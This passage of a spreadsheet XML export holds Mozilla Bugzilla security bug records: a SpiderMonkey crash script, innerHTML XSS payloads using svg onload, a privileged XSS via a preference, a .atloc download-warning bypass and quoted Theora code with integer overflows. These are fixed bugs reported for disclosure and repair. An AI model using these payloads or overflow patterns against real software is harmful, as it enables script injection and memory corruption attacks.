          <t>[sg:critical] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q3522" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3522" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3522" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3522" t="n">
        <v>1</v>
      </c>
      <c r="U3522" t="n">
        <v>0</v>
      </c>
      <c r="V3522" t="n">
        <v>33</v>
      </c>
      <c r="W3522" t="inlineStr">
        <is>
          <t>Pasting the following script into a debug js shell triggers
Assertion failure: OBJ_SCOPE(pobj)-&gt;object == pobj, at jsinterp.c:370
function boom()
{
  var b = {};
  Array.__proto__ = b;
  b.__proto__ = {};
  var c = {};
  c.__proto__ = [];
  try { c.__defineSetter__("t", undefined); } catch(e) { }
  c.__proto__ = Array;
  try { c.__defineSetter__("v", undefined); } catch(e) { }
}
boom();</t>
        </is>
      </c>
      <c r="X3522" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3523">
      <c r="A3523" t="n">
        <v>1562033</v>
      </c>
      <c r="B3523" t="inlineStr">
        <is>
          <t>2019-06-27 13:50:16 -0700</t>
        </is>
      </c>
      <c r="C3523" t="inlineStr">
        <is>
          <t>title.innerHTML = "&lt;/title&gt;&lt;foo&gt;" parses &lt;foo&gt; as a tag</t>
        </is>
      </c>
      <c r="D3523" t="inlineStr">
        <is>
          <t>2024-05-30 10:00:36 -0700</t>
        </is>
      </c>
      <c r="E3523" t="n">
        <v>1</v>
      </c>
      <c r="F3523" t="n">
        <v>1</v>
      </c>
      <c r="G3523" t="n">
        <v>3</v>
      </c>
      <c r="H3523" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3523" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3523" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K3523" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3523" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3523" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3523" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3523" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3523" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main69+][adv-esr68.1+][adv-esr60.9+], [wptsync upstream]</t>
        </is>
      </c>
      <c r="Q3523" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3523" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3523" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T3523" t="n">
        <v>1</v>
      </c>
      <c r="U3523" t="n">
        <v>0</v>
      </c>
      <c r="V3523" t="n">
        <v>51</v>
      </c>
      <c r="W3523" t="inlineStr">
        <is>
          <t>When creating any element (except "template" and "script" tags) using "document.createElement()" and "document.createElementNS()" function the provided HTML code gets rendered directly. Ideally the HTML code should not get rendered until it is manually inserted into DOM using "appendChild()" or similar function. I tested this issue on Chrome, Opera and Safari, they do not render the HTML code directly, also the HTML specs does not explicitly states to render the HTML code directly when creating the Elements. (Reference : https://dom.spec.whatwg.org/#dom-document-createelement)
For Example :
document.createElement("AnyElementBlahBlah").innerHTML="&lt;svg/onload=alert()&gt;"
This code would execute "alert()" function directly. We did not even need to insert the element in DOM.
Here's another interesting example : 
document.createElement("title").innerHTML="&lt;/title&gt;&lt;svg/onload=alert()&gt;"
Here the content of "title" element should not be rendered at all but we are able to escape out of "title" tag context by prepending a closing "title" tag as shown in above example. Using this trick we can render our HTML code inside "title" element as well and execute our Javascript code. Damn.
The same flaw applies to "document.createElementNS()" as well. 
For example : 
document.createElementNS("http://www.w3.org/1999/xhtml", "title").innerHTML="&lt;/title&gt;&lt;svg onload=alert()&gt;"
Impact:
It can introduce XSS vulnerability to many web applications because HTML specs does not states to render HTML such a way and also the other browsers does not follow this practice so technically it would be safe to allow untrusted input like "document.createElement("title").innerHTML='UntrustedUserInput' " as long as the input is verified before inserting it to DOM, however for Firefox that's not the case because Firefox will render the Untrusted Input directly which would lead to execution of malicious Javascript as well.
Tested On : 
- Firefox 68.0b13 (64-bit) 
- Firefox 67.0.4 (64-bit)</t>
        </is>
      </c>
      <c r="X3523" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3524">
      <c r="A3524" t="n">
        <v>1430974</v>
      </c>
      <c r="B3524" t="inlineStr">
        <is>
          <t>2018-01-16 20:18:16 -0800</t>
        </is>
      </c>
      <c r="C3524" t="inlineStr">
        <is>
          <t>Stored XSS in chrome://browser/content/browser-media.js line 40</t>
        </is>
      </c>
      <c r="D3524" t="inlineStr">
        <is>
          <t>2018-11-05 14:19:25 -0800</t>
        </is>
      </c>
      <c r="E3524" t="n">
        <v>1</v>
      </c>
      <c r="F3524" t="n">
        <v>1</v>
      </c>
      <c r="G3524" t="n">
        <v>2</v>
      </c>
      <c r="H3524" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3524" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3524" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3524" t="inlineStr">
        <is>
          <t>57 Branch</t>
        </is>
      </c>
      <c r="L3524" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3524" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3524" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3524" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3524" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main59+]</t>
        </is>
      </c>
      <c r="Q3524" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3524" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3524" t="inlineStr">
        <is>
          <t>Firefox 59</t>
        </is>
      </c>
      <c r="T3524" t="n">
        <v>1</v>
      </c>
      <c r="U3524" t="n">
        <v>0</v>
      </c>
      <c r="V3524" t="n">
        <v>10</v>
      </c>
      <c r="W3524" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Build ID: 20180103231032
Steps to reproduce:
Like for BUG 1430511, setting the value of the app.support.baseURL preference to include HTML content will cause an XSS issue in line 40 of chrome://browser/content/browser-media.js.
Actual results:
Whenever a EME video player plugins sends a cdm-disabled message to Firefox, the HTML content generated at line line 40 of chrome://browser/content/browser-media.js is showned in a notification popup. Therefore, any malicious content in the HTML code be executed including JavaScript (executed has privileged js ?!?!). 
Moreover, since :
1- A cdm-disabled message is triggered whenever a user is trying to play DRM while CDM plugging is disabled ;
2- Disabling CDM can be performed by writing to the prefs.js (user_pref("media.gmp-widevinecdm.enabled", false);) 
The malicious content execution could be triggered simply visiting a Web site offfering DRM content.
Expected results:
The value of app.support.baseURL should be sanatized prior to be inserted in HTML content at line 40 of chrome://browser/content/browser-media.js.</t>
        </is>
      </c>
      <c r="X3524" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3525">
      <c r="A3525" t="n">
        <v>526077</v>
      </c>
      <c r="B3525" t="inlineStr">
        <is>
          <t>2009-11-02 17:37:53 -0800</t>
        </is>
      </c>
      <c r="C3525" t="inlineStr">
        <is>
          <t>Implement Release Channels</t>
        </is>
      </c>
      <c r="D3525" t="inlineStr">
        <is>
          <t>2016-02-04 14:49:13 -0800</t>
        </is>
      </c>
      <c r="E3525" t="n">
        <v>1</v>
      </c>
      <c r="F3525" t="n">
        <v>1</v>
      </c>
      <c r="G3525" t="n">
        <v>6</v>
      </c>
      <c r="H3525" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3525" t="inlineStr">
        <is>
          <t>addons.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J3525" t="inlineStr">
        <is>
          <t>Developer Pages</t>
        </is>
      </c>
      <c r="K3525" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3525" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3525" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3525" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3525" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3525" t="inlineStr"/>
      <c r="Q3525" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3525" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3525" t="inlineStr">
        <is>
          <t>5.4</t>
        </is>
      </c>
      <c r="T3525" t="n">
        <v>1</v>
      </c>
      <c r="U3525" t="n">
        <v>1</v>
      </c>
      <c r="V3525" t="n">
        <v>34</v>
      </c>
      <c r="W3525" t="inlineStr">
        <is>
          <t>http://docs.google.com/Doc?docid=0Ad7mAOXgEBZyZGRzNnZ3YjRfMmc4ZGd3c2Mz&amp;hl=en
Designs coming shortly</t>
        </is>
      </c>
      <c r="X3525" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3526">
      <c r="A3526" t="n">
        <v>506838</v>
      </c>
      <c r="B3526" t="inlineStr">
        <is>
          <t>2009-07-27 20:09:59 -0700</t>
        </is>
      </c>
      <c r="C3526" t="inlineStr">
        <is>
          <t>Crash bug when moving mouse between fields [@AllowedToAct(JSContext*, int) ]</t>
        </is>
      </c>
      <c r="D3526" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:48 -0700</t>
        </is>
      </c>
      <c r="E3526" t="n">
        <v>1</v>
      </c>
      <c r="F3526" t="n">
        <v>1</v>
      </c>
      <c r="G3526" t="n">
        <v>3</v>
      </c>
      <c r="H3526" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3526" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3526" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K3526" t="inlineStr">
        <is>
          <t>1.9.1 Branch</t>
        </is>
      </c>
      <c r="L3526" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3526" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3526" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3526" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3526" t="inlineStr">
        <is>
          <t>[sg:investigate]</t>
        </is>
      </c>
      <c r="Q3526" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3526" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3526" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3526" t="n">
        <v>1</v>
      </c>
      <c r="U3526" t="n">
        <v>1</v>
      </c>
      <c r="V3526" t="n">
        <v>15</v>
      </c>
      <c r="W3526" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)
Fx crashes when moving mouse between fields. The file is an example that is an attachment to another bug report I am interested in, though I think this crashing is unrelated. 
Reproducible: Always
Steps to Reproduce:
1. go to https://bug418280.bugzilla.mozilla.org/attachment.cgi?id=304082
2. Move the mouse between fields quickly
Actual Results:  
Crash
Expected Results:  
No crash
If you install and activate firebug to receive the console.log calls, it does not crash.</t>
        </is>
      </c>
      <c r="X3526" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3527">
      <c r="A3527" t="n">
        <v>1709257</v>
      </c>
      <c r="B3527" t="inlineStr">
        <is>
          <t>2021-05-03 22:37:57 -0700</t>
        </is>
      </c>
      <c r="C3527" t="inlineStr">
        <is>
          <t>Fenix password manager is fooled by origin of http auth prompt, suggests passwords for the completely wrong site</t>
        </is>
      </c>
      <c r="D3527" t="inlineStr">
        <is>
          <t>2024-05-30 10:31:05 -0700</t>
        </is>
      </c>
      <c r="E3527" t="n">
        <v>1</v>
      </c>
      <c r="F3527" t="n">
        <v>1</v>
      </c>
      <c r="G3527" t="n">
        <v>2</v>
      </c>
      <c r="H3527" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3527" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J3527" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3527" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3527" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3527" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N3527" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3527" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3527" t="inlineStr">
        <is>
          <t>[adv-main89+]</t>
        </is>
      </c>
      <c r="Q3527" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3527" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S3527" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3527" t="n">
        <v>1</v>
      </c>
      <c r="U3527" t="n">
        <v>0</v>
      </c>
      <c r="V3527" t="n">
        <v>18</v>
      </c>
      <c r="W3527" t="inlineStr">
        <is>
          <t>Created attachment 9220022
Screenshot_20210428_182959_org.mozilla.firefox.jpg
+++ This bug was initially created as a clone of Bug #1708107 +++
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Firefox for Android
Steps to reproduce:
1) Open this URL - http://designs.ndev.xyz/test/new.html 
2) Click on the 'Click here to Open Apple.com'.
3) Wait for 1 second.
Actual results:
POC videos -
Android - https://youtu.be/SbQMQt86KKw
As you can see in the screenshot the http auth is suggesting the password of apple.com
Expected results:
The Fenix password manager should NOT be suggesting passwords that don't match the source of the http auth.</t>
        </is>
      </c>
      <c r="X3527" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3528">
      <c r="A3528" t="n">
        <v>1786188</v>
      </c>
      <c r="B3528" t="inlineStr">
        <is>
          <t>2022-08-21 03:04:26 -0700</t>
        </is>
      </c>
      <c r="C3528" t="inlineStr">
        <is>
          <t>Mozilla Firefox Download Protections were bypassed by .atloc / .ftploc files on MacOS</t>
        </is>
      </c>
      <c r="D3528" t="inlineStr">
        <is>
          <t>2023-07-17 13:27:05 -0700</t>
        </is>
      </c>
      <c r="E3528" t="n">
        <v>1</v>
      </c>
      <c r="F3528" t="n">
        <v>1</v>
      </c>
      <c r="G3528" t="n">
        <v>2</v>
      </c>
      <c r="H3528" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3528" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3528" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K3528" t="inlineStr">
        <is>
          <t>Firefox 106</t>
        </is>
      </c>
      <c r="L3528" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3528" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3528" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3528" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3528" t="inlineStr">
        <is>
          <t>[adv-main108+][adv-esr102.6+]</t>
        </is>
      </c>
      <c r="Q3528" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3528" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3528" t="inlineStr">
        <is>
          <t>109 Branch</t>
        </is>
      </c>
      <c r="T3528" t="n">
        <v>1</v>
      </c>
      <c r="U3528" t="n">
        <v>0</v>
      </c>
      <c r="V3528" t="n">
        <v>27</v>
      </c>
      <c r="W3528" t="inlineStr">
        <is>
          <t>Created attachment 9290778
poc.atloc
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Steps to reproduce:
Mozilla Firefox Download Protections were bypassed by .atloc / .ftploc files on MacOS 
I have identified CVE-2021-38510 patched in 2021. Further analysis confirmed that vulnerabilities in this category have not yet been fully patched in Mozilla Firefox.
CVE-2021-38510: https://www.mozilla.org/en-US/security/advisories/mfsa2021-48/#CVE-2021-38510
The patched vulnerability outputs the following warning when downloading the executable file called inetloc.
```
Open Executable File?
“poc.inetloc” is an executable file. Executable files may contain viruses or other malicious code that could harm your computer. Use caution when opening this file. Are you sure you want to launch “poc.inetloc”?
```
However, this warning does alert not work for `.atloc` and `.ftploc` which can perform the same function, the executable will be executed. This issue can be vulnerable to arbitrary command execution.
1. Download the attachment `poc.atloc` / `poc.ftploc`.
2. There is no warning about downloading this executable file.
Actual results:
The file is downloaded without warning
Expected results:
A warning should have been given</t>
        </is>
      </c>
      <c r="X3528" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3529">
      <c r="A3529" t="n">
        <v>515882</v>
      </c>
      <c r="B3529" t="inlineStr">
        <is>
          <t>2009-09-10 22:37:31 -0700</t>
        </is>
      </c>
      <c r="C3529" t="inlineStr">
        <is>
          <t>Unchecked dependencies on frame_height * frame_width not overflowing a 32 bit int</t>
        </is>
      </c>
      <c r="D3529" t="inlineStr">
        <is>
          <t>2010-01-24 10:24:04 -0800</t>
        </is>
      </c>
      <c r="E3529" t="n">
        <v>1</v>
      </c>
      <c r="F3529" t="n">
        <v>1</v>
      </c>
      <c r="G3529" t="n">
        <v>3</v>
      </c>
      <c r="H3529" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3529" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3529" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K3529" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L3529" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3529" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3529" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3529" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3529" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q3529" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3529" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3529" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3529" t="n">
        <v>1</v>
      </c>
      <c r="U3529" t="n">
        <v>0</v>
      </c>
      <c r="V3529" t="n">
        <v>23</v>
      </c>
      <c r="W3529" t="inlineStr">
        <is>
          <t>Dan Kaminsky reported some more problems with Theora to security@mozilla.org on Fri, 11 Sep 2009 06:53:21 +0200.
-------------------------------
Almost missed this.  There are dependencies *all over the place* that
frame_height * frame_width not overflow a 32 bit int -- both in theora
code and yours.  Almost missed because height and width are 16 bit
fields in Theora...ahh, but that's 16 bit before a 4 bit left shift.
Close, but no cigar :)
decinfo.c:
static int oc_info_unpack(oggpack_buffer *_opb,th_info *_info){
  long val;
  /*Check the codec bitstream version.*/
  theorapackB_read(_opb,8,&amp;val);
  _info-&gt;version_major=(unsigned char)val;
  theorapackB_read(_opb,8,&amp;val);
  _info-&gt;version_minor=(unsigned char)val;
  theorapackB_read(_opb,8,&amp;val);
  _info-&gt;version_subminor=(unsigned char)val;
  /*verify we can parse this bitstream version.
     We accept earlier minors and all subminors, by spec*/
  if(_info-&gt;version_major&gt;TH_VERSION_MAJOR||
   _info-&gt;version_major==TH_VERSION_MAJOR&amp;&amp;
   _info-&gt;version_minor&gt;TH_VERSION_MINOR){
    return TH_EVERSION;
  }
  /*Read the encoded frame description.*/
  theorapackB_read(_opb,16,&amp;val);
  _info-&gt;frame_width=(ogg_uint32_t)val&lt;&lt;4; // note this isn't actually
2**16-1, it's shifted by four bits, so it's 2**20-1
  theorapackB_read(_opb,16,&amp;val);
  _info-&gt;frame_height=(ogg_uint32_t)val&lt;&lt;4;// note this isn't actually
2**16-1, it's shifted by four bits, so it's 2**20-1
  theorapackB_read(_opb,24,&amp;val);
  _info-&gt;pic_width=(ogg_uint32_t)val;
  theorapackB_read(_opb,24,&amp;val);
  _info-&gt;pic_height=(ogg_uint32_t)val;
  theorapackB_read(_opb,8,&amp;val);
  _info-&gt;pic_x=(ogg_uint32_t)val;
  theorapackB_read(_opb,8,&amp;val);
  _info-&gt;pic_y=(ogg_uint32_t)val;
  theorapackB_read(_opb,32,&amp;val);
  _info-&gt;fps_numerator=(ogg_uint32_t)val;
  theorapackB_read(_opb,32,&amp;val);
  _info-&gt;fps_denominator=(ogg_uint32_t)val;
  if(_info-&gt;frame_width==0||_info-&gt;frame_height==0||
   _info-&gt;pic_width+_info-&gt;pic_x&gt;_info-&gt;frame_width|| // this check
won't bust anything below 2**20-1
   _info-&gt;pic_height+_info-&gt;pic_y&gt;_info-&gt;frame_height|| // this check
won't bust anything below 2**20-1
   _info-&gt;fps_numerator==0||_info-&gt;fps_denominator==0){
    return TH_EBADHEADER;
  }
  /*Note: The sense of pic_y is inverted in what we pass back to the
     application compared to how it is stored in the bitstream.
    This is because the bitstream uses a right-handed coordinate system, while
     applications expect a left-handed one.*/
  _info-&gt;pic_y=_info-&gt;frame_height-_info-&gt;pic_height-_info-&gt;pic_y;
  theorapackB_read(_opb,24,&amp;val);
  _info-&gt;aspect_numerator=(ogg_uint32_t)val;
  theorapackB_read(_opb,24,&amp;val);
  _info-&gt;aspect_denominator=(ogg_uint32_t)val;
  theorapackB_read(_opb,8,&amp;val);
  _info-&gt;colorspace=(th_colorspace)val;
  theorapackB_read(_opb,24,&amp;val);
  _info-&gt;target_bitrate=(int)val;
  theorapackB_read(_opb,6,&amp;val);
  _info-&gt;quality=(int)val;
  theorapackB_read(_opb,5,&amp;val);
  _info-&gt;keyframe_granule_shift=(int)val;
  theorapackB_read(_opb,2,&amp;val);
  _info-&gt;pixel_fmt=(th_pixel_fmt)val;
  if(_info-&gt;pixel_fmt==TH_PF_RSVD)return TH_EBADHEADER;
  if(theorapackB_read(_opb,3,&amp;val)&lt;0||val!=0)return TH_EBADHEADER;
  return 0;
}
We see the overflow itself all over the place...
decode.c:
static int oc_dec_postprocess_init(oc_dec_ctx *_dec){
...
  if(_dec-&gt;variances==NULL||
   _dec-&gt;pp_frame_has_chroma!=(_dec-&gt;pp_level&gt;=OC_PP_LEVEL_DEBLOCKC)){
    size_t frame_sz;
    frame_sz=_dec-&gt;state.info.frame_width*_dec-&gt;state.info.frame_height;
// overflow
    if(_dec-&gt;pp_level&lt;OC_PP_LEVEL_DEBLOCKC){
      _dec-&gt;variances=(int *)_ogg_realloc(_dec-&gt;variances,
       _dec-&gt;state.fplanes[0].nfrags*sizeof(_dec-&gt;variances[0]));
      _dec-&gt;pp_frame_data=(unsigned char *)_ogg_realloc(
       _dec-&gt;pp_frame_data,frame_sz*sizeof(_dec-&gt;pp_frame_data[0]));
// victim of overflow
      _dec-&gt;pp_frame_buf[0].width=_dec-&gt;state.info.frame_width;
      _dec-&gt;pp_frame_buf[0].height=_dec-&gt;state.info.frame_height;
      _dec-&gt;pp_frame_buf[0].stride=-_dec-&gt;pp_frame_buf[0].width;
      _dec-&gt;pp_frame_buf[0].data=_dec-&gt;pp_frame_data+
       (1-_dec-&gt;pp_frame_buf[0].height)*_dec-&gt;pp_frame_buf[0].stride;
// actual buffer to be written into, little messy but derived from
overflow
    }
...
}
nsOggDecoder.cpp (possible there's a filter before this is hit though):
void nsOggDecodeStateMachine::PlayVideo(FrameData* aFrame)
{
  //  NS_ASSERTION(PR_InMonitor(mDecoder-&gt;GetMonitor()), "PlayVideo()
called without acquiring decoder monitor");
  if (aFrame &amp;&amp; aFrame-&gt;mVideoHeader) {
    OggPlayVideoData* videoData =
oggplay_callback_info_get_video_data(aFrame-&gt;mVideoHeader);
    OggPlayYUVChannels yuv;
    yuv.ptry = videoData-&gt;y;
    yuv.ptru = videoData-&gt;u;
    yuv.ptrv = videoData-&gt;v;
    yuv.uv_width = aFrame-&gt;mUVWidth;
    yuv.uv_height = aFrame-&gt;mUVHeight;
    yuv.y_width = aFrame-&gt;mVideoWidth;
    yuv.y_height = aFrame-&gt;mVideoHeight;
    size_t size = aFrame-&gt;mVideoWidth * aFrame-&gt;mVideoHeight * 4; //
note this'll actually overflow on 32767*32767
    nsAutoArrayPtr&lt;unsigned char&gt; buffer(new unsigned char[size]);
    if (!buffer)
      return;
...
}
-------------------------------</t>
        </is>
      </c>
      <c r="X3529" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3530">
      <c r="A3530" t="n">
        <v>1203135</v>
      </c>
      <c r="B3530" t="inlineStr">
        <is>
          <t>2015-09-09 07:25:14 -0700</t>
        </is>
      </c>
      <c r="C3530" t="inlineStr">
        <is>
          <t>crash in link_shaders</t>
        </is>
      </c>
      <c r="D3530" t="inlineStr">
        <is>
          <t>2016-07-02 11:32:55 -0700</t>
        </is>
      </c>
      <c r="E3530" t="n">
        <v>1</v>
      </c>
      <c r="F3530" t="n">
        <v>1</v>
      </c>
      <c r="G3530" t="n">
        <v>3</v>
      </c>
      <c r="H3530" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3530" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3530" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K3530" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3530" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3530" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3530" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3530" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3530" t="inlineStr">
        <is>
          <t>[adv-main43+][adv-esr38.5+]</t>
        </is>
      </c>
      <c r="Q3530" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3530" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3530" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T3530" t="n">
        <v>1</v>
      </c>
      <c r="U3530" t="n">
        <v>0</v>
      </c>
      <c r="V3530" t="n">
        <v>26</v>
      </c>
      <c r="W3530" t="inlineStr">
        <is>
          <t>Created attachment 8658744
attachment.txt
This bug was filed from the Socorro interface and is 
report bp-66c41d6d-d10f-459f-b03b-b7ff22150909.
=============================================================
Note: this is a follow up issue filed for Bug 1189860. Marked as security-sensitive as well, since it derived from it.
Reproducible on:
* 41.0b8 (20150907144446)
* 42.0a2 (2015-09-07) e10s &amp; non-e10s
* 43.0a1 (2015-09-07) e10s &amp; non-e10s
Affected platforms:
Linux-only, tested with Ubuntu 14.04 (x86) and Ubuntu 14.04 (x64)
Steps to reproduce:
1. See attached HTML and JS; extract and name the JS "poc.js" and put it in the same folder as the extracted HTML.
2. Launch Firefox and load the HTML.
Expected result:
As in the case of Windows and Mac OS X platforms, a "Could not initialise shaders" error is displayed.
Actual result:
Firefox crashes.
Additional notes:
* See Bug 1189860, Comment 15 for context.</t>
        </is>
      </c>
      <c r="X3530" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3531">
      <c r="A3531" t="n">
        <v>1429189</v>
      </c>
      <c r="B3531" t="inlineStr">
        <is>
          <t>2018-01-09 11:39:04 -0800</t>
        </is>
      </c>
      <c r="C3531" t="inlineStr">
        <is>
          <t>Show shipping address errors on the summary screen</t>
        </is>
      </c>
      <c r="D3531" t="inlineStr">
        <is>
          <t>2018-04-30 18:25:29 -0700</t>
        </is>
      </c>
      <c r="E3531" t="n">
        <v>1</v>
      </c>
      <c r="F3531" t="n">
        <v>1</v>
      </c>
      <c r="G3531" t="n">
        <v>2</v>
      </c>
      <c r="H3531" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3531" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3531" t="inlineStr">
        <is>
          <t>WebPayments UI</t>
        </is>
      </c>
      <c r="K3531" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3531" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3531" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3531" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3531" t="inlineStr">
        <is>
